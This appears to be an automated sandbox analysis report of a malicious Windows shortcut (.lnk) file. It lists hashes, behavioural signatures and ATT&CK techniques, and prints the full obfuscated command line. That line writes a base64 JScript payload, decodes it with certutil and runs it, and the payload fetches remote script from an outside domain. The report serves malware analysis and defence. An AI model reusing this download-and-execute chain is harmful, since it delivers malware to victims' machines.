c7abadaa4f3e9cb734fe374459a1931d54ef5a5b111a8418fb1d5a4cf66121ae

Analysis

max time kernel
135s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
22-03-2023 12:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

notaNpadua3015548.042790.62825.lNk.lnk
Size

505B
MD5

14ae337cac88ef7daa8da4465ea5378c
SHA1

6cc43ae0b0cf92c935924509c53f3a4c29b7ec4d
SHA256

c7abadaa4f3e9cb734fe374459a1931d54ef5a5b111a8418fb1d5a4cf66121ae
SHA512

1af8d432ba5da34474619ccdbf1fa99606f00578f8f5c97282685cd2808718f21c5c0ace1341a6193699207a312dfafab6819306d42704f2d88dd1ad8df8342b

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
13	1444	WScript.exe
15	1444	WScript.exe
16	1444	WScript.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings	cmd.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4832	conhost.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4796 wrote to memory of 4832	4796	cmd.exe	86
PID 4796 wrote to memory of 4832	4796	cmd.exe	86
PID 4832 wrote to memory of 1972	4832	conhost.exe	87
PID 4832 wrote to memory of 1972	4832	conhost.exe	87
PID 1972 wrote to memory of 1856	1972	cmd.exe	88
PID 1972 wrote to memory of 1856	1972	cmd.exe	88
PID 1972 wrote to memory of 1444	1972	cmd.exe	89
PID 1972 wrote to memory of 1444	1972	cmd.exe	89

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\notaNpadua3015548.042790.62825.lNk.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4796
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "md C:\X0RUX9T\>nul 2>&1 &&s^eT RPSQ=C:\X0RUX9T\^X0RUX9T.^jS&&echo dmFyIEN2TWM9InNjIisiciI7RHZNYz0iaXAiKyJ0OmgiO0V2TWM9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDdk1jK0R2TWMrRXZNYysiLy93aW9pcjEubHVjY2FlYXJ0aHVydGVsYXNsdGRhLmZvdW5kYXRpb24vPzEvIik7>!RPSQ!&&cErtUtil -f -dEco^de !RPSQ! !RPSQ!&&ca^ll !RPSQ!"
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /V/D/c "md C:\X0RUX9T\>nul 2>&1 &&s^eT RPSQ=C:\X0RUX9T\^X0RUX9T.^jS&&echo dmFyIEN2TWM9InNjIisiciI7RHZNYz0iaXAiKyJ0OmgiO0V2TWM9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDdk1jK0R2TWMrRXZNYysiLy93aW9pcjEubHVjY2FlYXJ0aHVydGVsYXNsdGRhLmZvdW5kYXRpb24vPzEvIik7>!RPSQ!&&cErtUtil -f -dEco^de !RPSQ! !RPSQ!&&ca^ll !RPSQ!"
    3⤵
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:1972
  - - C:\wINdOws\sYSteM32\certutil.exe
      cErtUtil -f -dEcode C:\X0RUX9T\X0RUX9T.jS C:\X0RUX9T\X0RUX9T.jS
      4⤵
      PID:1856
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\X0RUX9T\X0RUX9T.jS"
      4⤵
      Blocklisted process makes network request
      PID:1444

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\notaNpadua3015548.042790.62825.lNk.lnk

Filesize
1KB

MD5
126c5baac8f31fe34f50fc3778bdbaee

SHA1
9efc7b149e59efb605dce0893741e3a3a32f8ddc

SHA256
0c17183dfef359477dc4ba60cdf86c19a5857afdde84d8c5ea8ae9501ce6fbdc

SHA512
116bf24be1de134eb4c5391f7ea9a257fb5e32f91e15bd263dcdffdcc3ff974b75afd0bebefb4e5b35164dd6afeb4e9aeabe282c8014d2db0ccdb98029b59869

Download Submit
C:\X0RUX9T\X0RUX9T.jS

Filesize
126B

MD5
d11e70279cd4022268543a6b976057c2

SHA1
ffdf4b4d09b0057257da3f4b842a6fee561fb78b

SHA256
4779d67a8ff64c0bc54dea7c98658b28feb0b2f400b6d3760dbca8e2987e64dc

SHA512
be68b7f0601e8fd1750917416fde80c73c60210d01459fed83176fb011157fe62d936df65ed3dda268e5a6e48c838658d14ba8ccb4faa887c8c82451c0341301

Download Submit
C:\X0RUX9T\X0RUX9T.jS

Filesize
126B

MD5
d11e70279cd4022268543a6b976057c2

SHA1
ffdf4b4d09b0057257da3f4b842a6fee561fb78b

SHA256
4779d67a8ff64c0bc54dea7c98658b28feb0b2f400b6d3760dbca8e2987e64dc

SHA512
be68b7f0601e8fd1750917416fde80c73c60210d01459fed83176fb011157fe62d936df65ed3dda268e5a6e48c838658d14ba8ccb4faa887c8c82451c0341301

Download Submit